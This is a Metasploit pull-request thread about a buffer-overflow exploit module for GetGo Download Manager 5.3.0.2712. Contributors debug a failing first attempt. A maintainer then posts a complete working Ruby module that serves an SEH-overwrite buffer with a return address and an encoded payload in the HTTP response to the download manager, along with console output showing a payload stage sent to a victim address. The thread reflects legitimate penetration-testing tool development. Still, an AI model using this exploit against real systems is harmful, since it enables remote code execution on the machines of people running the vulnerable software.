Add GetGo Download Manager bof exploit

[Auxilus]

GetGo Download Manager 5.3.0.2712 - Buffer Overflow
https://www.exploit-db.com/exploits/44187/

Verification

• Start msfconsole
• use exploit/windows/smb/getgo_bof
• set RHOST
• exploit

[asoto-r7]

Hey @Auxilus, thanks for the submission and for reaching out on our Slack! Two pieces of quick feedback, and a third, more involved item:

1. Would you update the documentation to include the commands used, and a example output from a successful exploit? For a good example, check out plugx.md. Note that they've provided step-by-step walkthrough instructions and example output from Metasploit.

2. Since we're exploiting the browser inside the GetGo software, I would suggest moving the exploit from misc to browser. To do this, you'd need to move the file from modules/exploits/windows/misc/getgo_bof.rb to modules/exploits/windows/browser/getgo_bof.rb.

3. In testing the module, I compared it to the ExploitDB code and there's one major difference we'll need to tackle. Looking at the POC's comments

1. setup listener 443 on attacking machine
2. run script on attacking machine
3. open app on victim machine
4. go to download
5. select new, add http://attackerip to URL, index.html to File Name, and select OK

(Note: You should disregard that the above says "port 443", when the code is actually listening on port 80. They're referring to the port the payload will call back on.)

The exploit works by setting up an HTTP listener on port 80 on the attacker's box, then having the victim visit the attacker's HTTP listener. But the exploit code here does not listen; instead it tries connects to connect to the attacker. In other words:

The working ExploitDB version does this:

/-----------\    exploit   /------------\
|   VICTIM  |      -->     |  ATTACKER  |
\-----------/              \------------/


The not-working Metasploit module is trying this:

/-----------\    exploit   /------------\
|   VICTIM  |      <--     |  ATTACKER  |
\-----------/              \------------/

Since the victim is not listening on port 80, the exploit fails.

So, we'll need to modify the Metasploit module to listen on port 80. To do that, I would start with swapping out Msf::Exploit::Remote::Tcp for Msf::Exploit::Remote::HttpServer::HTML, which is documented here and used in these similar modules: aim_goaway, mirc_irc_url

Hopefully that's enough to give you a solid start. Feel free to reach out with any questions.

Thanks again!

[Auxilus]

@asoto-r7 thanks for the info, Yes I did figure that out.. I used Msf::Exploit::Remote::HttpServer::HTML.
Afaik this HttpServer doesn't create the actual file described by URIPATH, so the software is giving file not found error.
But opening the URL in Chrome/Firefox prints out the exploit

[Auxilus]

I'll update the documentation asa I get the exploit to work

[asoto-r7]

@Auxilus : Hey, how's it going? Any updates?

[Auxilus]

Somethings wrong, the software gives file not found error, I'm gonna pull up wireshark... Maybe tomorrow..

BTW the original python script works fine...

[Auxilus]

The exploit crashes the software on windows xp but no session's opened... I don't think I can debug that, I might need some help

[wchen-r7]

Sorry we've lost momentum in this pull request. I'll take a look and see what I can figure out. Thank you.

[wchen-r7]

Hi @Auxilus (cc @asoto-r7 ), so I figured out what's wrong with it. Turns out you're just not exploiting the buffer correctly. If you send the data in the HTTP response status instead of the HTTP body, you can overflow it and gain code execution. So I rewrote the exploit for you:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Getgosoft Getgo Download Manager Buffer Overflow',
      'Description'    => %q{
        This exploits a buffer overflow vulnerability against
        Getgosoft Getgo Download Manager.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bzyo' # Ported PoC to metasploit
        ],
      'References'     =>
        [
          [ 'EDB', '44187' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'SRVPORT'  => 80
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # Yup there is no bad chars for the payload
          'BadChars'   => "\x00"
        },
      'Targets'        =>
        [
          [ 'GetGo Download Manager v5.3.0.2712',
            {
              'Offset'  => 4095,
              # 0:016> u 0x72d11f39
              # msacm32!wodMessage+0xd0f:
              # 72d11f39 5f              pop     edi
              # 72d11f3a 5e              pop     esi
              # 72d11f3b c20400          ret     4
              'Ret'     => 0x72d11f39,
              # 12253 is the same size the python PoC used
              'MaxSize' => 12253
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Feb 27 2018',
      'DefaultTarget'  => 0))
  end

  def send_exploit(cli)
    seh_record = generate_seh_record(target.ret)
    # Minus 4 for the SEH record
    buffer = "A" * (target['Offset'] - 4)
    buffer << seh_record
    #buffer << (0x01..0xff).to_a.pack('C*')
    buffer << payload.encoded
    buffer << "D" * (target['MaxSize'] - buffer.length)
    res = create_response(200, buffer)
    cli.send_response(res)
  end

  def on_request_uri(cli, request)
    if request.headers['User-Agent'].to_s.include?('GetGo Download Manager')
      print_status("Attempting to exploit #{cli.peerhost}")
      send_exploit(cli)
    else
      print_error("#{cli.peerhost} isn't connecting with the right browser. Sending 404")
      send_not_found(cli)
    end
  end
end

=begin
[*] Using URL: http://0.0.0.0:80/1XBWCE8s2j0HUa
[*] Local IP: http://192.168.0.12:80/1XBWCE8s2j0HUa
[*] Server started.
[*] 192.168.0.34     getgo_bof - Attempting to exploit 192.168.0.34
[*] Sending stage (180291 bytes) to 192.168.0.34
=end

However, I suspect this exploit might be the same as https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/getgodm_http_response_bof.rb, let me take a look at that....

[wchen-r7]

@Auxilus So it turns out they are the same thing, but the current one targets an older version of the app, and requires an update. What I'll do here is update that module with you credited, and then I'll close the PR. Thanks for the submission!

[Auxilus]

thanks @wchen-r7 much appreciated 😀

[wchen-r7]

Release Notes

The GetGo Download Manager buffer overflow exploit now supports version 5. Documentation for the module has also been added.